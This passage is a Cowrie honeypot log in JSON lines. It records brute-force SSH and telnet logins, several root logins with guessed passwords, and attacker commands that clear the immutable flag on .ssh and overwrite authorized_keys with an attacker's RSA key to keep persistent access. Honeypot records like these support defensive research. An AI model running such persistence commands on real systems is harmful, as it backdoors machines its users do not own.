{"eventid":"cowrie.session.closed","duration":12.451330184936523,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:27:59.285940Z","src_ip":"212.227.235.229","session":"a6aa20967419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60366,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e692a471e6d","protocol":"telnet","message":"New connection: 212.227.235.229:60366 (1.2.3.4:23) [session: 2e692a471e6d]","sensor":"my-vps","timestamp":"2025-09-09T01:27:59.531535Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5853,"dst_ip":"1.2.3.4","dst_port":22,"session":"af11ba7ebedc","protocol":"ssh","message":"New connection: 212.227.235.229:5853 (1.2.3.4:22) [session: af11ba7ebedc]","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.026214Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.027313Z","src_ip":"212.227.235.229","session":"af11ba7ebedc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6155,"dst_ip":"1.2.3.4","dst_port":22,"session":"729c2bc558e4","protocol":"ssh","message":"New connection: 212.227.235.229:6155 (1.2.3.4:22) [session: 729c2bc558e4]","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.161570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.162264Z","src_ip":"212.227.235.229","session":"729c2bc558e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40564,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1373789dfe2","protocol":"ssh","message":"New connection: 212.227.235.229:40564 (1.2.3.4:22) [session: e1373789dfe2]","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.197060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.198116Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.297469Z","src_ip":"212.227.235.229","session":"729c2bc558e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.318575Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.704656Z","src_ip":"212.227.235.229","session":"729c2bc558e4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty22","message":"login attempt [root/qwerty22] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.838862Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T01:28:02.842191Z","session":"729c2bc558e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:03.132785Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.133463Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.134694Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.255386Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:03.513889Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.514566Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.637458Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.638417Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40578,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f0213d8cd74","protocol":"ssh","message":"New connection: 212.227.235.229:40578 (1.2.3.4:22) [session: 2f0213d8cd74]","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.754116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.755112Z","src_ip":"212.227.235.229","session":"2f0213d8cd74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:03.873320Z","src_ip":"212.227.235.229","session":"2f0213d8cd74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:04.389029Z","src_ip":"212.227.235.229","session":"2f0213d8cd74"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:05.509520Z","src_ip":"212.227.235.229","session":"2f0213d8cd74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60454,"dst_ip":"1.2.3.4","dst_port":22,"session":"13e1e137794c","protocol":"ssh","message":"New connection: 212.227.235.229:60454 (1.2.3.4:22) [session: 13e1e137794c]","sensor":"my-vps","timestamp":"2025-09-09T01:28:05.625556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:05.626469Z","src_ip":"212.227.235.229","session":"13e1e137794c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:05.744281Z","src_ip":"212.227.235.229","session":"13e1e137794c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59664,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a02e8012beb","protocol":"ssh","message":"New connection: 212.227.235.229:59664 (1.2.3.4:22) [session: 8a02e8012beb]","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.091371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.092026Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.257713Z","src_ip":"212.227.235.229","session":"13e1e137794c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.359332Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.377669Z","src_ip":"212.227.235.229","session":"13e1e137794c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:06.379116Z","src_ip":"212.227.235.229","session":"e1373789dfe2"}
{"eventid":"cowrie.login.success","username":"root","password":"fabregas","message":"login attempt [root/fabregas] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:28:07.470350Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:08.066098Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:08.066849Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:28:08.067970Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:08.336435Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:28:08.924932Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:28:08.925635Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:28:09.194433Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:09.195320Z","src_ip":"212.227.235.229","session":"8a02e8012beb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60766,"dst_ip":"1.2.3.4","dst_port":22,"session":"549e9d68f030","protocol":"ssh","message":"New connection: 212.227.235.229:60766 (1.2.3.4:22) [session: 549e9d68f030]","sensor":"my-vps","timestamp":"2025-09-09T01:28:09.443870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:09.445075Z","src_ip":"212.227.235.229","session":"549e9d68f030"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:28:09.703714Z","src_ip":"212.227.235.229","session":"549e9d68f030"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:28:10.778959Z","src_ip":"212.227.235.229","session":"549e9d68f030"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.040395Z","src_ip":"212.227.235.229","session":"549e9d68f030"}
{"eventid":"cowrie.session.closed","duration":12.743359088897705,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.274825Z","src_ip":"212.227.235.229","session":"2e692a471e6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33512,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5cde4f74f04","protocol":"ssh","message":"New connection: 212.227.235.229:33512 (1.2.3.4:22) [session: f5cde4f74f04]","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.311787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.312655Z","src_ip":"212.227.235.229","session":"f5cde4f74f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60683,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc45ce4a0fa0","protocol":"telnet","message":"New connection: 212.227.235.229:60683 (1.2.3.4:23) [session: cc45ce4a0fa0]","sensor":"my-vps","timestamp":"2025-09-09T01:28:12.540468Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@